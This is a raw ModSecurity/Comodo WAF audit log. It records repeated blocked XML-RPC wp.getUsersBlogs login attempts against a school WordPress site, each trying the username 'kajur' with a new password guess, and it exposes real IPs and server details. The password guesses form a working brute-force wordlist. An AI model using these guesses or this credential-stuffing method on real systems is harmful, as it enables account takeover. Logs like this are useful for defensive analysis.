wp.getUsersBlogs
kajur
admin123!@#
--54f23740-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--54f23740-E--
--54f23740-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079010046387 5392 (- - -)
Stopwatch2: 1745079010046387 5392; combined=3778, p1=438, p2=3171, p3=0, p4=0, p5=99, sr=85, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--54f23740-Z--
--cd5a5515-A--
[19/Apr/2025:23:11:10 +0700] aAPLHg6cTFSgLAHl7PpNGgAAABc 103.236.140.4 33078 103.236.140.4 8181
--cd5a5515-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--cd5a5515-C--
wp.getUsersBlogs
kajur
kajur2009
--cd5a5515-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cd5a5515-E--
--cd5a5515-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (33+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079070582046 6071 (- - -)
Stopwatch2: 1745079070582046 6071; combined=4264, p1=538, p2=3555, p3=0, p4=0, p5=101, sr=91, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cd5a5515-Z--
--6bff9f3e-A--
[19/Apr/2025:23:12:10 +0700] aAPLWg6cTFSgLAHl7PpNNAAAAAw 103.236.140.4 33382 103.236.140.4 8181
--6bff9f3e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6bff9f3e-C--
wp.getUsersBlogs
kajur
p@ssw0rd
--6bff9f3e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6bff9f3e-E--
--6bff9f3e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079130189595 4331 (- - -)
Stopwatch2: 1745079130189595 4331; combined=3274, p1=365, p2=2737, p3=0, p4=0, p5=100, sr=80, sw=72, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6bff9f3e-Z--
--9ad7e62c-A--
[19/Apr/2025:23:13:10 +0700] aAPLlg6cTFSgLAHl7PpNUQAAAAA 103.236.140.4 33700 103.236.140.4 8181
--9ad7e62c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9ad7e62c-C--
wp.getUsersBlogs
kajur
112233
--9ad7e62c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9ad7e62c-E--
--9ad7e62c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079190872959 5421 (- - -)
Stopwatch2: 1745079190872959 5421; combined=3899, p1=477, p2=3188, p3=0, p4=0, p5=135, sr=112, sw=99, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9ad7e62c-Z--
--c6180255-A--
[19/Apr/2025:23:14:11 +0700] aAPL00ruoUXZj665VUFxJQAAANY 103.236.140.4 34012 103.236.140.4 8181
--c6180255-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c6180255-C--
wp.getUsersBlogs
kajur
du7p72w5
--c6180255-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c6180255-E--
--c6180255-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079251310933 4745 (- - -)
Stopwatch2: 1745079251310933 4745; combined=3545, p1=424, p2=2956, p3=0, p4=0, p5=97, sr=76, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c6180255-Z--
--54fde55f-A--
[19/Apr/2025:23:15:13 +0700] aAPMEUruoUXZj665VUFxPgAAAMA 103.236.140.4 34304 103.236.140.4 8181
--54fde55f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--54fde55f-C--
wp.getUsersBlogs
kajur
kajur@1999
--54fde55f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--54fde55f-E--
--54fde55f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079313577325 5382 (- - -)
Stopwatch2: 1745079313577325 5382; combined=3789, p1=447, p2=3135, p3=0, p4=0, p5=132, sr=87, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--54fde55f-Z--
--2ba16b33-A--
[19/Apr/2025:23:16:29 +0700] aAPMXXNa4dA2HllpK_PmsQAAAIs 103.236.140.4 34668 103.236.140.4 8181
--2ba16b33-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2ba16b33-C--
wp.getUsersBlogs
kajur
Marketing2015
--2ba16b33-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2ba16b33-E--
--2ba16b33-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (29+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079389240559 4923 (- - -)
Stopwatch2: 1745079389240559 4923; combined=3839, p1=441, p2=3221, p3=0, p4=0, p5=104, sr=88, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2ba16b33-Z--
--4f2de214-A--
[19/Apr/2025:23:17:36 +0700] aAPMoEruoUXZj665VUFxcQAAANg 103.236.140.4 35012 103.236.140.4 8181
--4f2de214-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4f2de214-C--
wp.getUsersBlogs
kajur
kajur@1987
--4f2de214-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4f2de214-E--
--4f2de214-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (38+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079456025708 5280 (- - -)
Stopwatch2: 1745079456025708 5280; combined=3722, p1=447, p2=3107, p3=0, p4=0, p5=99, sr=89, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4f2de214-Z--
--4037f74a-A--
[19/Apr/2025:23:18:39 +0700] aAPM33Na4dA2HllpK_Pm7wAAAJc 103.236.140.4 35320 103.236.140.4 8181
--4037f74a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4037f74a-C--
wp.getUsersBlogs
kajur
marketing2024_
--4037f74a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4037f74a-E--
--4037f74a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079519373919 5322 (- - -)
Stopwatch2: 1745079519373919 5322; combined=3804, p1=477, p2=3148, p3=0, p4=0, p5=104, sr=87, sw=75, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4037f74a-Z--
--400c857f-A--
[19/Apr/2025:23:19:41 +0700] aAPNHQ6cTFSgLAHl7PpN1gAAABM 103.236.140.4 35614 103.236.140.4 8181
--400c857f-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--400c857f-C--
wp.getUsersBlogs
kajur
pwd123
--400c857f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--400c857f-E--
--400c857f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (28+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079581242593 5117 (- - -)
Stopwatch2: 1745079581242593 5117; combined=3647, p1=441, p2=3030, p3=0, p4=0, p5=102, sr=88, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--400c857f-Z--
--ca900371-A--
[19/Apr/2025:23:20:42 +0700] aAPNWkruoUXZj665VUFxlwAAAMU 103.236.140.4 35906 103.236.140.4 8181
--ca900371-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ca900371-C--
wp.getUsersBlogs
kajur
scotland
--ca900371-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ca900371-E--
--ca900371-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079642402882 5294 (- - -)
Stopwatch2: 1745079642402882 5294; combined=4182, p1=515, p2=3494, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ca900371-Z--
--0355e725-A--
[19/Apr/2025:23:21:45 +0700] aAPNmQ6cTFSgLAHl7PpOBwAAAA0 103.236.140.4 36218 103.236.140.4 8181
--0355e725-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 217
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--0355e725-C--
wp.getUsersBlogs
kajur
casper
--0355e725-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0355e725-E--
--0355e725-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (30+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079705091405 5947 (- - -)
Stopwatch2: 1745079705091405 5947; combined=4141, p1=535, p2=3415, p3=0, p4=0, p5=112, sr=93, sw=79, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0355e725-Z--
--ced09e29-A--
[19/Apr/2025:23:22:47 +0700] aAPN1w6cTFSgLAHl7PpOGwAAAAM 103.236.140.4 36542 103.236.140.4 8181
--ced09e29-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 234
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ced09e29-C--
wp.getUsersBlogs
kajur
smkn22-jkt-sch-id123456
--ced09e29-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ced09e29-E--
--ced09e29-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079767489612 4856 (- - -)
Stopwatch2: 1745079767489612 4856; combined=3742, p1=435, p2=3126, p3=0, p4=0, p5=105, sr=86, sw=76, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ced09e29-Z--
--6b96a53c-A--
[19/Apr/2025:23:23:53 +0700] aAPOGXNa4dA2HllpK_PnUgAAAJA 103.236.140.4 36860 103.236.140.4 8181
--6b96a53c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6b96a53c-C--
wp.getUsersBlogs
kajur
q1w2e3r4t5
--6b96a53c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6b96a53c-E--
--6b96a53c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079833552261 5275 (- - -)
Stopwatch2: 1745079833552261 5275; combined=3821, p1=446, p2=3139, p3=0, p4=0, p5=133, sr=88, sw=103, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6b96a53c-Z--
--c2fb2555-A--
[19/Apr/2025:23:25:00 +0700] aAPOXA6cTFSgLAHl7PpOWwAAABM 103.236.140.4 37202 103.236.140.4 8181
--c2fb2555-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 218
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c2fb2555-C--
wp.getUsersBlogs
kajur
Jessica
--c2fb2555-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c2fb2555-E--
--c2fb2555-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745079900723218 5316 (- - -)
Stopwatch2: 1745079900723218 5316; combined=3776, p1=449, p2=3131, p3=0, p4=0, p5=112, sr=87, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c2fb2555-Z--
--8c5d5836-A--
[19/Apr/2025:23:26:00 +0700] aAPOmEruoUXZj665VUFyDgAAANc 103.236.140.4 37490 103.236.140.4 8181
--8c5d5836-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8c5d5836-C--
wp.getUsersBlogs
kajur
pa$$w0rd
--8c5d5836-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c5d5836-E--
--8c5d5836-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
